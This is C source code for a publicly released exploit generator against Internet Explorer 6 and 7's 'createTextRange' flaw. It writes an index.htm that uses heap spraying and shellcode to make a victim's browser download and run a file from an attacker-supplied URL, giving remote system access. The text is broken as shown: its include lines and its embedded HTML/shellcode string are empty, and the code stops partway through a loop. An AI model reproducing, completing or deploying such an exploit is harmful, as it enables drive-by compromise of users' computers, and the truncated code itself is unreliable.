/* * * Internet Explorer "createTextRang" Download Shellcoded Exploit (2) * Bug discovered by Computer Terrorism (UK) * http://www.computerterrorism.com/research/ct22-03-2006 * * Affected Software: Microsoft Internet Explorer 6.x & 7 Beta 2 * Severity: Critical * Impact: Remote System Access * Solution Status: Unpatched * * E-Mail: atmaca@icqmail.com * Web: http://www.spyinstructors.com,http://www.atmacasoft.com * Credit to Kozan,SkyLined,delikon,Darkeagle,Stelian Ene * */ /* * * This one is more faster than all released createTextRange exploits * because it uses last version of SkyLined's heap spraying code, * special 10x goes to him. * */ #include #include #define BUF_LEN 0x800 #define FILE_NAME "index.htm" char body1[] = "\r\n" ""; int main(int argc,char *argv[]) { if (argc < 2) { printf("\nInternet Explorer \"createTextRang\" Download Shellcoded Exploit (2)"); printf("\nCoded by ATmaCA (atmaca[at]icqmail.com)\n"); printf("\nUsage:\n"); printf("ie_exp \n"); return 0; } FILE *File; char *pszBuffer; char *web = argv[1]; char *pu = "%u"; char u_t[5]; char *utf16 = (char*)malloc(strlen(web)*5); if ( (File = fopen(FILE_NAME,"w+b")) == NULL ) { printf("\n [Err:] fopen()"); exit(1); } pszBuffer = (char*)malloc(BUF_LEN); memcpy(pszBuffer,body1,sizeof(body1)-1); memset(utf16,'\0',strlen(web)*5); for (unsigned int i=0;i